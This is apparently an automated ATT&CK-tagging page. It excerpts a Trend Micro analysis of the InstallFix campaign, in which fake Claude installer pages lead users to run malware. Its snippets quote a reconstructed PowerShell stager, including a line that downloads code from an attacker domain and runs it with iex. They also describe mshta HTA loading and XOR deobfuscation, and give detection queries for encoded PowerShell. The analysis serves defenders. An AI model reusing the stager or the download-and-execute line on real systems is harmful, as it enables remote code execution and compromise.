TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Trend Micro Research

InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise

Mohamed Fahmy · 1 day ago

ATT&CK techniques detected

29 predictions
T1027 Obfuscated Files or Information · 100%
“://$nipple[.]oakenfjrod[.]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1) - <nipple> - MD5-based machine ID - oakenfjrod.ru - attacker-controlled domain - /cloude-... - remote payload path during the fourth stage of execution (cloude-91267b64-…”

T1059.001 PowerShell · 99%
“single archive. This archive appears to hold a normal file. The contents of the file appear to consist of normal file components. At this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application. The embedded HTML …”

T1027 Obfuscated Files or Information · 99%
“the deobfuscation process, the first character was decoded to derive the key required for further decryption. This step serves as an example of the underlying logic used to reconstruct the full payload from its obfuscated form. Logic to get the XOR key - combine numbers and remov…”

T1059.001 PowerShell · 99%
“…swow64 PowerShell binary with a UTF-16LE Base64-encoded payload via the -e flag. The decoded PowerShell stager performs the following operations in sequence: - Victim fingerprinting: computes MD5(COMPUTERNAME + USERNAME), takes the first 16 hex characters in lowercase…”

T1059.001 PowerShell · 98%
“(iex) # Decoded PowerShell stager logic (reconstructed from Base64 telemetry) # Step 1 victim fingerprint $nipple = (Get-FileHash -InputStream ([IO.MemoryStream]::new([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME))) -Algorit…”

T1059.001 PowerShell · 96%
“…sphtmlwindow2.resizeTo(0, 0) call ensures the mshta window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence. Stage 4: cmd.exe reconstructs po…”

T1027 Obfuscated Files or Information · 92%
“…sphtmlwindow2.resizeTo(0, 0) call ensures the mshta window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence. Stage 4: cmd.exe reconstructs po…”

T1218.005 Mshta · 92%
“presents an OS-specific command and instructs the user to run it, framing execution as a required installation step. On Windows, executing the command causes the browser or shell to invoke mshta.exe against the remote payload URL. Stage 2: mshta fetches and executes ZIP/HTA …”

T1053.005 Scheduled Task · 85%
“part of its deobfuscation or evasion technique. With the XOR key now obtained, we can proceed to deobfuscate the encoded bytes and continue with further analysis of the payload. Based on the decryption routine, the data is first converted from decimal and Base64 formats, then XOR…”

T1105 Ingress Tool Transfer · 72%
“Stage-4 fetch and execute $filter = (New-Object Net.WebClient).DownloadString("https://$nipple.oakenfjrod[.]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1") iex $filter The victim-unique subdomain (16-character hex derived from machine ide…”

T1218.005 Mshta · 70%
“an archive file with 'PK' magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly. Process chain observed in tel…”

T1059.001 PowerShell · 69%
“-f51f-4de8-95a4-f561cc55ebc4 The appended HTA executes VBScript silently inside mshta.exe. The script uses two named decoding functions to deobfuscate its payload before launching the next stage: - displayemailgnu() - hex-decodes obfuscated strings embedded in the ht…”

T1059.001 PowerShell · 69%
“or processName:cscript.exe) Encoded PowerShell/IEX in command line eventSubId:TELEMETRY_PROCESS_CREATE AND processName:powershell.exe AND (processCmd:*-enc* OR processCmd:*-encodedcommand* OR processCmd:*iex* OR processCmd:*invoke-expression* O…”

T1189 Drive-by Compromise · 69%
“running commands (for example, “curl-to-bash”), attackers take advantage of this behavior by creating fake but realistic installation pages. These pages trick users into executing malicious commands, leading to malware infections. The threat is especially significant beca…”

T1071.001 Web Protocols · 68%
“[.]177[.]239[.]255. TCP send and TCP receive activity was observed on the infected host. This indicates that the malware is actively establishing network connections and exchanging data with external systems. Such activity suggests potential communication with command-a…”

T1218.005 Mshta · 66%
“-f51f-4de8-95a4-f561cc55ebc4 The appended HTA executes VBScript silently inside mshta.exe. The script uses two named decoding functions to deobfuscate its payload before launching the next stage: - displayemailgnu() - hex-decodes obfuscated strings embedded in the ht…”

T1027.010 Command Obfuscation · 47%
“…sphtmlwindow2.resizeTo(0, 0) call ensures the mshta window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence. Stage 4: cmd.exe reconstructs po…”

T1204.002 Malicious File · 43%
“InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise Cyber Threats InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick user…”

T1059.001 PowerShell · 39%
“an archive file with 'PK' magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly. Process chain observed in tel…”

T1218.005 Mshta · 37%
“:mshta.exe AND (processCmd:*1-5-8[.]com* OR processCmd:*msixbundle* OR processCmd:*get-version[.]com*) // Step 2: pivot on endpointHostName from above — find PS child and C2 beacon endpointHostName:<hostname_from_step1> AND ((eventSubId:T…”

T1059 Command and Scripting Interpreter · 37%
“…sphtmlwindow2.resizeTo(0, 0) call ensures the mshta window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence. Stage 4: cmd.exe reconstructs po…”

T1204.002 Malicious File · 36%
“single archive. This archive appears to hold a normal file. The contents of the file appear to consist of normal file components. At this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application. The embedded HTML …”

T1059.005 Visual Basic · 35%
“…sphtmlwindow2.resizeTo(0, 0) call ensures the mshta window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence. Stage 4: cmd.exe reconstructs po…”

T1202 Indirect Command Execution · 35%
“an archive file with 'PK' magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly. Process chain observed in tel…”

T1059 Command and Scripting Interpreter · 34%
“an archive file with 'PK' magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly. Process chain observed in tel…”

T1204.002 Malicious File · 34%
“presents an OS-specific command and instructs the user to run it, framing execution as a required installation step. On Windows, executing the command causes the browser or shell to invoke mshta.exe against the remote payload URL. Stage 2: mshta fetches and executes ZIP/HTA …”

T1204.004 Malicious Copy and Paste · 33%
“running commands (for example, “curl-to-bash”), attackers take advantage of this behavior by creating fake but realistic installation pages. These pages trick users into executing malicious commands, leading to malware infections. The threat is especially significant beca…”

T1059.005 Visual Basic · 32%
“an archive file with 'PK' magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly. Process chain observed in tel…”

T1059.001 PowerShell · 31%
“…hell and mshta to execute and install a counterfeit Claude application on Windows systems and macOS systems, though the buttons on the fake website seem to not work. The malvertising URL is designed to mimic a Google Ads link structure. The parameters gar_source and gad_cam…”

Summary

Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&C servers for additional payloads.